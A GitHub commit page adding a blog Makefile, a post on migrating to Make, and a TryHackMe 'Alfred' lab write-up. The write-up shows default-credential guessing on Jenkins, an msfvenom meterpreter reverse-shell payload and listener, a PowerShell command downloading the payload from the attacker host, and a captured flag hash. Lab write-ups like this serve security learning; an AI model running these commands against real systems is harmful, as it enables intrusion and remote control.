-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Published THM: Alfred, THM: GameZone, Making Life easy and migrated t…
…o Make
- Loading branch information
1 parent
e134e47
commit 6cab227
Showing
11 changed files
with
437 additions
and
49 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,40 @@ | ||
# Makefile for building and publishing a site | ||
# Directories | ||
PUBLIC_DIR := public | ||
POSTS_DIR := $(PUBLIC_DIR)/posts | ||
|
||
# Targets | ||
.DEFAULT_GOAL := local | ||
|
||
# Remove local directory | ||
clean: | ||
echo "Cleaning public dir" | ||
@if [ -d $(PUBLIC_DIR) ]; then \ | ||
rm -rf $(PUBLIC_DIR) && echo "Local directory deleted"; \ | ||
fi | ||
|
||
# Build the site using Emacs | ||
build: clean | ||
echo "Building the site" | ||
emacs -Q --script build-site.el | ||
|
||
# Add latest posts to /index.html | ||
add_latest_posts: | ||
echo "Adding latest posts (archive) on /index.html" | ||
echo '<ul class="org-ul indexul">' > /tmp/index | ||
grep "^<li>" $(PUBLIC_DIR)/posts/recents.html | head -5 >> /tmp/index | ||
echo '</ul>' >> /tmp/index | ||
sed -i -e '/Latest Articles<\/a><\/h2>/r /tmp/index' $(PUBLIC_DIR)/index.html | ||
|
||
# Copy /index.html to /posts/index.html | ||
copy_index_to_posts: | ||
echo "Copying /index to /posts/index" | ||
cp $(PUBLIC_DIR)/index.html $(POSTS_DIR)/index.html | ||
|
||
# Serve the public directory on localhost using Python | ||
serve_local: | ||
cd $(PUBLIC_DIR) && python3 -m http.server | ||
|
||
# Build the site locally | ||
local: build add_latest_posts copy_index_to_posts serve_local | ||
blog: build add_latest_posts copy_index_to_posts |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,126 @@ | ||
#+TITLE: THM: Alfred | ||
#+DATE: <2023-11-30 14:34> | ||
#+DESCRIPTION: | ||
#+FILETAGS: thm ctf | ||
|
||
* Intro: Be Yourself :noexport: | ||
|
||
Sometimes clashing with others, even temporarily, is unavoidable. | ||
|
||
|
||
* Intro | ||
This time, other than just populating ~/etc/hosts~ with ~alfred.thm~, I | ||
also ran the following, to help me use my /standardized/ notes. | ||
#+NAME: add to all shell | ||
#+begin_src bash | ||
echo "export IP=alfred.thm" >> ~/.bashrc | ||
#+end_src | ||
|
||
* Reconnaissance | ||
Simple nmap scan to find our open tcp ports: | ||
#+begin_src bash | ||
nmap -sV -sC -oN nmap.initial $IP | ||
#+end_src | ||
|
||
And this gives us: | ||
- [ ] 80 (HTTP) | ||
- [ ] 3389 (TCpwrapped) - Alfred | ||
- [ ] 8080 (HTTP) | ||
|
||
** Web Analysis: Port 80 Web Server | ||
- Minimal starting web page, started gobuster while trying the usual | ||
spots. Nothing of interest came up | ||
- Gobuster with big revealed nothing | ||
|
||
#+NAME: Gobuster with IP and default path | ||
#+begin_src bash | ||
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -u http://$IP -o gobuster.big | ||
#+end_src | ||
|
||
** Web Analysis: Port 8080 Web Server | ||
- Jenkins entry portal | ||
- Robots.txt disallows everything on root | ||
- The password is at this point unknown | ||
- I searched online for the default (and popular) credentials: | ||
- Admin:password (did not work) | ||
- Admin:admin (did not work) | ||
- some other combs | ||
- found the actual one | ||
|
||
#+begin_comment | ||
admin:admin | ||
#+end_comment | ||
#+caption: Jenkins Entry portal | ||
[[file:images/Reconnaissance/20231130_145031_screenshot.png]] | ||
|
||
|
||
|
||
#+begin_quote | ||
At this point I viewed another writeup, to see how they had solved | ||
that step, since my solution was at best sketchy. Hydra bruteforce was | ||
another, better way to go. | ||
#+end_quote | ||
|
||
* Using Alfred | ||
Since I already knew that Alfred is a CI/CD server, even though I had | ||
never worked on it, it was relatively simple: | ||
- I knew there had to be a way to build the projects, and sure enough | ||
that action was *directly* modifiable. | ||
|
||
#+caption: Build configuration screen | ||
[[file:images/Using_Alfred/20231201_231517_screenshot.png]] | ||
|
||
At this point, it is obvious that we need to get initial foothold | ||
through a reverse shell of some kind. I saw the room's suggestion of | ||
uploading and then executing one there, but I first wanted to try it | ||
my way. | ||
|
||
Using [[https://www.revshells.com/][online rev shell generator]], I got a reverse shell, but it did | ||
not exactly look beautiful. Python did not exist on the system, which | ||
made me unable to use the now-standard, pty spawn methodology. | ||
However, that did not stop me from getting the flag. Unlikeable is not unusable. | ||
|
||
#+begin_comment | ||
79007a09481963edf2e1321abd9ae2a0 | ||
#+end_comment | ||
|
||
* Upgrading our shell | ||
The room then suggests that we get a meterpreter shell, which I again, | ||
trying to avoid the /walkthrough/ character of it, did my way. | ||
|
||
** MSFvenom | ||
Just a simple meterpreter reverse shell: | ||
|
||
#+NAME: MSFvenom reverse shell generation | ||
#+begin_src cmd | ||
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.67.161 LPORT=6969 -f exe -o reverse.exe | ||
#+end_src | ||
|
||
|
||
** Meterpreter listener | ||
Get the listener up and running | ||
|
||
#+NAME: MSFvenom reverse shell generation | ||
#+begin_src cmd | ||
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.67.161; set lport 6969; exploit" | ||
#+end_src | ||
|
||
** Downloading File | ||
My experience with windows is quite limited and that's why I had to go | ||
into a little bit more research to get this over with :( | ||
|
||
Having found an interesting article in the [[http://blog.commandlinekungfu.com/2009/11/episode-70-tangled-web.html][Command Line Kung Fu]] | ||
blog, I started with the following | ||
#+begin_src cmd | ||
powershell -c '(New-Object System.Net.WebClient).DownloadFile("http://10.10.67.161:8000/reverse.exe","c:\Users\bruce\reverse.exe")' | ||
#+end_src | ||
|
||
But it did not work. Even though it did not return any error codes, I | ||
could see in my simple python server that no requests had been made. | ||
Evidently it did not need that many modifications to work, it is just | ||
that I may have used a syntax that resembled way too much this | ||
procedure in Linux. | ||
|
||
* Privilege escalation | ||
Sadly ~getsystem~ works perfectly, and we get ~NT AUTHORITY\SYSTEM~, | ||
without it being necessary to do anything. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,96 @@ | ||
#+TITLE: Make-ing my life easier | ||
#+DATE: <2023-12-27 12:25> | ||
#+DESCRIPTION: Notes on how I migrated to Make for this website, so that I can easily preview my posts before publishing | ||
#+FILETAGS: make python blog config | ||
|
||
|
||
* Introduction | ||
#+begin_comment | ||
This is the second article for the day, but it is simply the result of | ||
a longer period of not publishing. | ||
#+end_comment | ||
|
||
At the time of writing my blog directory surely is cluttered, and I | ||
*really* do not want this. It prevents me from easily checking my | ||
website (not sure if the clutter caused my lack of proper at times | ||
documentation or the other way round), but it has to change. Here I | ||
expect to document the next 10 minutes briefly for me, so that it all | ||
makes sense | ||
|
||
* Goal | ||
What I expect to do here is quickly create a makefile, with a ~local~ | ||
set of instructions, that will: | ||
1. Create a ~public~ directory and populate it | ||
2. Launch a python server | ||
|
||
* Execution | ||
Using the ~local-build.sh~ script, I knew this would not take too much. | ||
Being an open source file and not really bothered by the | ||
confidentiality of its contents, I uploaded it to ChatGPT asking for | ||
it to be refactored and documented into a Makefile: | ||
#+begin_example | ||
# Makefile for building and publishing a site | ||
# Directories | ||
PUBLIC_DIR := public | ||
POSTS_DIR := $(PUBLIC_DIR)/posts | ||
|
||
# Targets | ||
.DEFAULT_GOAL := local | ||
|
||
# Remove local directory | ||
clean: | ||
@if [ -d $(PUBLIC_DIR) ]; then \ | ||
rm -rf $(PUBLIC_DIR) && echo "Local directory deleted"; \ | ||
fi | ||
|
||
# Build the site using Emacs | ||
build: clean | ||
emacs -Q --script build-site.el | ||
|
||
# Add latest posts to /index.html | ||
add_latest_posts: | ||
echo "Adding mini archive on /index.html" | ||
echo '<ul class="org-ul indexul">' > /tmp/index | ||
grep "^<li>" $(PUBLIC_DIR)/posts/recents.html | head -5 >> /tmp/index | ||
echo '</ul>' >> /tmp/index | ||
sed -i -e '/Latest Articles<\/a><\/h2>/r /tmp/index' $(PUBLIC_DIR)/index.html | ||
|
||
# Copy /index.html to /posts/index.html | ||
copy_index_to_posts: | ||
echo "Copying /index to /posts/index" | ||
cp $(PUBLIC_DIR)/index.html $(POSTS_DIR)/index.html | ||
|
||
# Build the site locally | ||
local: build add_latest_posts copy_index_to_posts | ||
#+end_example | ||
|
||
It did a good job, which I suppose can also be attributed to the | ||
proper yet by no means extensive commenting on the shell script. | ||
|
||
Adding a new target and updating local does the job: | ||
#+begin_example | ||
# Serve the public directory on localhost using Python | ||
serve_local: | ||
cd $(PUBLIC_DIR) && python -m http.server | ||
#+end_example | ||
|
||
* Completion | ||
At this point everything is perfect, and well documented enough that I | ||
could refactor the whole blog, where spaghetti code is not only | ||
dominant but visible in its basic structure and organization as well, | ||
making it more manageable. | ||
|
||
* Some extra thoughts | ||
It is truly fascinating that I managed within *much less* than fifteen | ||
minutes to: | ||
- make a shell script obsolete | ||
- make another shell script obsolete (further reducing the mess that I | ||
had embraced and my discomfort) | ||
- Better streamline the whole publish sequence by creating a central | ||
file to use (makefile) | ||
- write this simple article | ||
|
||
With *minimal* experience in using and creating Makefiles. In fact, | ||
I thought I could try my hand at creating this manually and googled | ||
*Makefile templates* before realizing what a waste of time this would | ||
be. Ah, what a wonderful and yet peculiar time to be alive! |
Oops, something went wrong.